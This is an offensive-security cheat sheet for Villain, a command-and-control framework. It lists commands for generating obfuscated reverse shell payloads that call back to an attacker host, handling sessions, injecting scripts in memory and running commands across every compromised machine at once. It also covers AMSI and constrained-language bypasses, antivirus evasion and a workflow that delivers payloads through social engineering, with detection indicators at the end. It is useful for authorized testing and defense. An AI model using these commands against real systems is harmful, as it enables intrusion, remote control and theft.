VILLAIN
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Python-based C2 framework for generating and managing reverse shell sessions across Windows and Linux targets. Supports multi-session handling, command routing, and team collaboration.
INSTALLATION & SETUP#
# Clone and install git clone https://github.com/t3l3machus/Villain cd Villain pip install -r requirements.txt # Or with pipx pipx install villain # Start Villain python3 Villain.py # Start with custom port python3 Villain.py -p 6501 # Start with specific interface python3 Villain.py -i 0.0.0.0 -p 6501 # Quiet mode python3 Villain.py -q
GENERATING PAYLOADS#
# In Villain shell: # Full syntax Villain > generate payload=<OS/HANDLER/TEMPLATE> lhost=<IP_OR_IFACE> [obfuscate] [encode] # Windows reverse TCP (PowerShell) Villain > generate payload=windows/reverse_tcp/powershell lhost=eth0 encode # Windows HoaxShell (HTTP-based) Villain > generate payload=windows/hoaxshell/powershell lhost=eth0 obfuscate # Linux reverse TCP Villain > generate payload=linux/reverse_tcp/bash lhost=eth0 # Linux HoaxShell Villain > generate payload=linux/hoaxshell/sh_curl lhost=eth0 obfuscate # Payload types - Windows: PowerShell-based reverse shell (hoaxshell) - Linux: Bash/Python-based reverse shell # hoaxshell integration (Windows) Villain integrates hoaxshell for Windows payloads Uses constrained language mode bypass techniques HTTP-based reverse shell via legitimate Windows processes
LISTENERS#
# Listeners are created automatically with payload generation # Default: HTTP-based listeners # List active listeners Villain > listeners # Custom listener port Villain > generate os=windows lhost=ATTACKER_IP lport=8443
SESSION MANAGEMENT#
# List active sessions Villain > sessions # Interact with a session Villain > shell SESSION_ID # Background a session Ctrl+C or type "back" # Kill a session Villain > kill SESSION_ID # Session info Villain > sessions -i SESSION_ID
COMMANDS#
# Shell commands (within a session, use "shell SESSION_ID" first) Villain (SESSION) > whoami Villain (SESSION) > dir Villain (SESSION) > ipconfig Villain (SESSION) > type C:\flag.txt # Upload file to target (from within shell session) upload /local/path /remote/path # Fileless script execution (HTTP-loaded, in-memory) inject /path/to/local/script.ps1 # Interactive Windows shell (ConPTY, PowerShell sessions only) conptyshell eth0 4444 SESSION_ID # Command inspector (catch mistakes that hang shells) cmdinspector ON cmdinspector OFF
MULTI-SESSION OPERATIONS#
# Execute on all active sessions Villain > exec_all "whoami" Villain > exec_all "hostname" # Useful for mass reconnaissance Villain > exec_all "systeminfo | findstr /B /C:\"OS\"" Villain > exec_all "net user"
TEAM SERVER (SIBLING SERVERS)#
# Villain supports multi-operator collaboration # Connect Villain instances together # Connect to sibling server (default team port: 65001) Villain > connect SIBLING_IP 65001 # Chat with connected teammates (prefix with #) Villain > #Hello team, I have new sessions # Exit without killing sessions (HoaxShell sessions auto-reconnect) Villain > flee # Purge stored session metadata Villain > purge
CONPTYSHELL (INTERACTIVE SHELL)#
# Upgrade to fully interactive PTY shell (Windows) # Avoids PowerShell constrained language mode issues # Within a session: Villain > conptyshell SESSION_ID
BUILT-IN FEATURES#
- Automatic payload obfuscation - AMSI bypass in Windows payloads - HTTP-based C2 communication - Session persistence across restarts - Command history per session - Tab completion - Multi-OS payload support - Sibling server collaboration - hoaxshell integration for stealth
PAYLOAD OBFUSCATION#
# Automatic obfuscation flag Villain > generate os=windows lhost=IP lport=PORT obfuscate # Obfuscation techniques applied: - Variable name randomization - String concatenation and splitting - Base64 encoding layers - PowerShell escape character insertion - Case randomization
KEY OPTIONS & FLAGS#
Flag Description Default ---- ----------- ------- -i Listen interface 0.0.0.0 -p Listen port 6501 -q Quiet mode false -c Cert file for HTTPS auto-generated -k Key file for HTTPS auto-generated
COMMANDS REFERENCE#
Command Description ------- ----------- generate Create reverse shell payload sessions List active sessions shell Interact with session kill Terminate a session upload Upload file to target download Download file from target exec_all Execute on all sessions alias Manage command aliases connect Connect to sibling server listeners List active listeners conptyshell Upgrade to ConPTY shell help Show help clear Clear screen exit Exit Villain
WORKFLOW EXAMPLE#
# 1. Start Villain python3 Villain.py -p 6501 # 2. Generate payload Villain > generate os=windows lhost=10.10.14.1 lport=8443 obfuscate # 3. Deliver payload to target (social engineering, exploit, etc.) # 4. Wait for callback # [+] Session established: SESSION_ID # 5. Interact Villain > shell SESSION_ID Villain (SESSION) > whoami Villain (SESSION) > systeminfo # 6. Pivot or escalate as needed
COMPARISON WITH OTHER C2#
Feature Villain Cobalt Strike Sliver Havoc ------- ------- ------------- ------ ----- License OSS Commercial OSS OSS Language Python Java Go Go/C++ Setup Simple Moderate Simple Moderate Complexity Low High Medium Medium Platforms Win/Lin Win/Lin/Mac All Windows GUI CLI Java GUI CLI Qt GUI BOF Support No Yes Yes Yes Sleep Obfusc. No Limited No Yes Best For Quick ops Full engagmt Modern C2 Evasion
OPSEC CONSIDERATIONS#
- HTTP-based C2 (no encryption by default without HTTPS) - Enable HTTPS with -c and -k for encrypted communication - Obfuscate payloads to bypass basic AV detection - hoaxshell-based payloads use legitimate Windows processes - Simple C2 = smaller footprint = harder to fingerprint - Not designed for long-term persistent operations - Best suited for initial access and quick post-exploitation - Combine with more robust C2 for extended operations - PowerShell execution may trigger script block logging
DETECTION INDICATORS#
- PowerShell execution with encoded commands - HTTP callbacks to non-standard ports - Process execution patterns from reverse shell - PowerShell constrained language mode bypass attempts - AMSI bypass patterns in PowerShell logs - Unusual child processes from powershell.exe or cmd.exe